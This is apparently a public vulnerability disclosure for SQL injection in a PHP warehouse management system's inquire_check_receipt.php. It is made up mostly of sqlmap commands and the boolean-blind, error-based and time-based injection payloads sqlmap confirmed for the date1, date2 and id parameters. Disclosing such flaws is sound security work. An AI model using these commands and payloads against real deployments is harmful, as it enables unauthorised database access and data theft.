wms
wms copied to clipboard
Published
20 hours ago •
FeMiner
FeMiner
SQL injection in /test/inquire_check_receipt.php
How can there be so many SQL injections in one file.
Lines 6-30
When the GET parameter option is' date ', two more GET parameters,' date1 'and' date2 ', will be received. Obviously, the $limit_string variable judged below will be assigned a part of the SQL statement concatenated with either' date1 'or' date2 ', and finally carried to lines 23-30 for execution as the SQL statement.
There are three scenarios for testing directly using sqlmap
python sqlmap.py -u "http://127.0.0.1/wms/test/inquire_check_receipt.php?option=date&date1=1" -p "date1" --batch --risk=3 --level=5 --dbms=mysql -dbs
Parameter: date1 (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: option=date&date1=1' AND 5409=5409-- tQWr
Type: error-based
Title: MySQL >= 5.6 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (GTID_SUBSET)
Payload: option=date&date1=1' AND GTID_SUBSET(CONCAT(0x7162767a71,(SELECT (ELT(8708=8708,1))),0x7178626b71),8708)-- ZcIx
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: option=date&date1=1' AND (SELECT 3264 FROM (SELECT(SLEEP(5)))THZh)-- SEXh
python sqlmap.py -u "http://127.0.0.1/wms/test/inquire_check_receipt.php?option=date&date2=1" -p "date2" --batch --risk=3 --level=5 --dbms=mysql -dbs
Parameter: date2 (GET)
Type: boolean-based blind
Title: OR boolean-based blind - WHERE or HAVING clause (NOT)
Payload: option=date&date2=1' OR NOT 3035=3035-- mDFK
Type: error-based
Title: MySQL >= 5.6 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (GTID_SUBSET)
Payload: option=date&date2=1' AND GTID_SUBSET(CONCAT(0x7162767a71,(SELECT (ELT(7937=7937,1))),0x7178626b71),7937)-- UdHZ
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: option=date&date2=1' AND (SELECT 1667 FROM (SELECT(SLEEP(5)))SELQ)-- xLBv
python sqlmap.py -u "http://127.0.0.1/wms/test/inquire_check_receipt.php?option=date&date1=1&date2=1" -p "date1,date2" --batch --risk=3 --level=5 --dbms=mysql -dbs
Parameter: date2 (GET)
Type: boolean-based blind
Title: OR boolean-based blind - WHERE or HAVING clause (NOT)
Payload: option=date&date2=1' OR NOT 3035=3035-- mDFK
Type: error-based
Title: MySQL >= 5.6 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (GTID_SUBSET)
Payload: option=date&date2=1' AND GTID_SUBSET(CONCAT(0x7162767a71,(SELECT (ELT(7937=7937,1))),0x7178626b71),7937)-- UdHZ
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: option=date&date2=1' AND (SELECT 1667 FROM (SELECT(SLEEP(5)))SELQ)-- xLBv
Parameter: date1 (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: option=date&date1=1' AND 5409=5409-- tQWr
Type: error-based
Title: MySQL >= 5.6 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (GTID_SUBSET)
Payload: option=date&date1=1' AND GTID_SUBSET(CONCAT(0x7162767a71,(SELECT (ELT(8708=8708,1))),0x7178626b71),8708)-- ZcIx
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: option=date&date1=1' AND (SELECT 3264 FROM (SELECT(SLEEP(5)))THZh)-- SEXh
However, there is still a situation where when the parameter option is warehouse, the GET variable ID is also included as part of the $limit_string SQL statement in the subsequent SQL query, which is basically the same as above.
python sqlmap.py -u "http://127.0.0.1/wms/test/inquire_check_receipt.php?option=warehouse&id=1" -p "id" --batch --risk=3 --level=5 -dbs
Parameter: id (GET)
Type: boolean-based blind
Title: OR boolean-based blind - WHERE or HAVING clause (NOT)
Payload: option=warehouse&id=1' OR NOT 5735=5735-- ytFp
Type: error-based
Title: MySQL >= 5.6 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (GTID_SUBSET)
Payload: option=warehouse&id=1' AND GTID_SUBSET(CONCAT(0x7162767a71,(SELECT (ELT(3839=3839,1))),0x7178626b71),3839)-- Rtmw
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: option=warehouse&id=1' AND (SELECT 2885 FROM (SELECT(SLEEP(5)))lRDE)-- VIXY
